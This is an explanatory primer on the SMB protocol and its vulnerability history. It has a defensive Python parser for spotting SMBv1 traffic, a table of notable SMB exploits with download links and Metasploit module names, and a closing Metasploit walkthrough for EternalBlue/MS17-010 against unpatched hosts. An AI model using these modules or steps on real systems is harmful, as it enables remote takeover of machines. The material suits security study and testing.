SMB is a client-server communication protocol used for sharing resources on a network.  Server Message Block (SMB) allows clients to read from and write to a server service, providing core authentication and communications for Windows file and print servers. It was (and is) so popular that *nix operating systems created their own compatible Samba service for Windows/Unix/Linux interoperability. SMB also has one of the longest vulnerability histories of any network protocol in use today (www.cvedetails.com lists almost 2,700 SMB-related vulnerabilities). Despite having been updated several times by Microsoft, new vulnerabilities continue to emerge. Most apply to the Windows version, but some impact Samba as well.

The SMB protocol is a request-response protocol: the client and server exchange multiple messages to establish a connection before any file operation takes place. Clients connect to servers over TCP/IP (strictly, NetBIOS over TCP/IP as specified in RFC 1001 and RFC 1002), NetBEUI or IPX/SPX.

How does SMB work?

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

SMB normally runs over TCP port 139 (the NetBIOS session service) or, since Windows 2000, directly over TCP port 445.
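As an added illustration of the framing described above (this is not code from the original page): a small Python parser that strips the 4-byte transport header used on ports 445/139 and classifies each message as SMB1 or SMB2/3, which a defender can run over captured payloads to spot legacy SMBv1 negotiation. The sample payloads are constructed, not captured traffic.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB1_COM_NEGOTIATE = 0x72   # SMB_COM_NEGOTIATE command byte in the SMB1 header
SMB2_NEGOTIATE = 0x0000     # SMB2 NEGOTIATE command code

@dataclass
class SmbMessage:
    family: str          # "SMB1" or "SMB2" (SMB 3.x uses the SMB2 header too)
    command: int
    is_response: bool

def parse_smb(tcp_payload: bytes) -> Optional[SmbMessage]:
    """Parse one message as carried on TCP 445/139: a 4-byte session header
    (type 0x00 = session message, 3-byte big-endian length) then an SMB header."""
    if len(tcp_payload) < 4 or tcp_payload[0] != 0x00:
        return None
    length = int.from_bytes(tcp_payload[1:4], "big")
    body = tcp_payload[4:4 + length]
    if len(body) < length:
        return None                                   # truncated frame: do not guess
    if body.startswith(SMB1_MAGIC) and len(body) >= 32:
        # SMB1 header = magic(4) command(1) status(4) flags(1) flags2(2) ... 32 bytes total
        return SmbMessage("SMB1", body[4], bool(body[9] & 0x80))   # 0x80 = SMB_FLAGS_REPLY
    if body.startswith(SMB2_MAGIC) and len(body) >= 64:
        # SMB2 header = magic(4) size(2) charge(2) status(4) command(2) credits(2) flags(4) ... 64 bytes
        command, = struct.unpack_from("<H", body, 12)
        flags, = struct.unpack_from("<I", body, 16)
        return SmbMessage("SMB2", command, bool(flags & 0x1))      # 0x1 = SMB2_FLAGS_SERVER_TO_REDIR
    return None

def smbv1_negotiates(payloads: List[bytes]) -> int:
    """Count SMB1 NEGOTIATE requests: a simple sign that an SMBv1-speaking client is on the wire."""
    hits = 0
    for p in payloads:
        m = parse_smb(p)
        if m and m.family == "SMB1" and m.command == SMB1_COM_NEGOTIATE and not m.is_response:
            hits += 1
    return hits

def frame(body: bytes) -> bytes:
    return b"\x00" + len(body).to_bytes(3, "big") + body

# Constructed sample payloads (not captured traffic).
SMB1_NEGOTIATE_REQ = frame(SMB1_MAGIC + bytes([SMB1_COM_NEGOTIATE]) + b"\x00" * 4
                           + b"\x18" + b"\x53\xc8" + b"\x00" * 20            # 32-byte header
                           + b"\x00" + b"\x0c\x00" + b"\x02NT LM 0.12\x00")  # dialect list
SMB2_NEGOTIATE_RESP = frame(SMB2_MAGIC
                            + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, SMB2_NEGOTIATE, 1, 0x1, 0, 0, 0, 0, 0)
                            + b"\x00" * 16 + b"\x41\x00")                    # signature + body start
NOT_SMB = b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"
```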

Exploit-db.com lists 61 exploits related to SMB, dating from 1995 to the present. Packetstormsecurity.com lists 314. Metasploit has 43 in its database. The following table summarizes a few of the more notable ones.

Exploit: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
Description: CVE-2018-0833. Null pointer dereference DoS. Works against SMB 2.0 & 3.0. Affected systems: Windows 8.1, 2012 R2. Currently no Microsoft Advisory number.
Tool Location: https://packetstormsecurity.com/files/146593/Microsoft-Windows-8.1-2012-R2-SMB-Denial-Of-Service.html

Exploit: Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation
Description: CVE-2018-0749. Allows privilege escalation. Affected systems: Windows 10 (1703 and 1709), 8.1, 7. Currently no Microsoft Advisory number.
Tool Location: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43517.zip

Exploit: EternalBlue/EternalRomance/EternalSynergy/EternalChampion (MS17-010)
Description: CVE-2017-0143, CVE-2017-0146, CVE-2017-0147. Allows arbitrary remote code execution. Variants: MS17-010 SMB Remote Windows Kernel Pool Corruption, MS17-010 SMB RCE Detection, MS17-010 SMB Remote Windows Command Execution. Affected systems: Windows Vista SP2 through Server 2016, both 32- and 64-bit.
Tool Location: Shadow Brokers Fuzzbunch; Metasploit modules: exploit/windows/smb/ms17_010_eternalblue, exploit/windows/smb/ms17_010_psexec, auxiliary/admin/smb/ms17_010_command

Exploit: Windows Redirect-to-SMB (2017)
Description: CVE-ID (unknown). Exploits urlmon.dll API functions. Attacker sends a malicious link that redirects to a file:// URL. Windows automatically tries to authenticate to the malicious SMB server with the victim's credentials, which can then be harvested. Affected systems: Windows 8.1, 10, Server 2012 R2, Server 2016. Currently no Microsoft Advisory number. Based on early Internet Explorer exploits reported by insecure.org in 1997 (IE Bug #4, MS Security Advisory 974926).
Tool Location: www.secureworks.com/blog/attacking-windows-smb-zero-day-vulnerability

Exploit: LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)
Description: CVE-2016-7237. Remote memory corruption. Can allow DoS or elevation of privilege. Affected systems: Windows XP, Server 2003, Vista, 7, 8.1, Server 2008 R2, Server 2012/2012 R2, 10, Server 2016.
Tool Location: www.exploit-db.com/exploits/40744

Exploit: SMB Relay Code Execution (MS08-068)
Description: CVE-2008-4037. NTLM replay attack. Allows arbitrary remote code execution. Affected systems: Windows 2000 SP4, XP SP 2/3, Server 2003 SP1/2, Vista, Server 2008.
Tool Location: Metasploit module: exploit/windows/smb/smb_relay; https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/7125.zip

Exploit: Microsoft Server Service Relative Path Stack Corruption (MS08-067)
Description: CVE-2008-4250. Allows arbitrary remote code execution. Vulnerability in NetAPI32.dll. Updates MS06-040. Has variants. Affected systems: All editions/service packs of Windows Server 2000, XP, Server 2003.
Tool Location: Metasploit module: exploit/windows/smb/ms08_067_netapi; https://www.exploit-db.com/exploits/7104/; https://www.exploit-db.com/exploits/40279/

Exploit: Microsoft Local Privilege Escalation (MS06-030)
Description: CVE-2006-2373. Allows elevation of privilege. Disables ReadOnly Memory protection in Registry. Affected systems: Windows 2000 SP4, XP SP0/1/2, Server 2003.
Tool Location: www.exploit-db.com/exploits/1911

Exploit: Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) and (2) (MS02-045)
Description: CVE-2002-0724. Boundary condition error. Affected systems: Windows XP SP0 (all editions), NT 4.0 (all editions, all service packs), Windows 2000 (all editions, all service packs).
Tool Location: https://www.securityfocus.com/bid/5556/exploit; https://packetstormsecurity.com/files/26596/SMBdie.zip.html; https://packetstormsecurity.com/search/?q=smbnuke.c

Note: To search Metasploit for SMB-related exploits, at the msf console, enter search smb type:exploit.

Note: To retrieve a count of how many SMB-related exploits are in the Metasploit database, at the Metasploit console, enter grep -c smb search exploit.

An example of a critical error:

Microsoft Security Bulletin MS17-010 - Critical
This security update resolves vulnerabilities in Microsoft Windows, related to remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.

If you are lucky enough to find an unpatched box, Metasploit has an exploit built to run that only requires a target and listener IP address.

Fire up Metasploit with the msfconsole command, then select the module:

use exploit/windows/smb/ms17_010_eternalblue

or

msf6 > use exploit/windows/smb/ms17_010_psexec
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS {Target-IP}
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST {Your-IP}
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
Reference: Exploit-DB, Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - ‘EternalBlue’ SMB Remote Code Execution (MS17-010), CVE-2017-0144, remote exploit for the Windows platform.

CVE-2017-0144: The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted…

https://www.cisecurity.org/wp-content/uploads/2019/01/Security-Primer-EternalBlue.pdf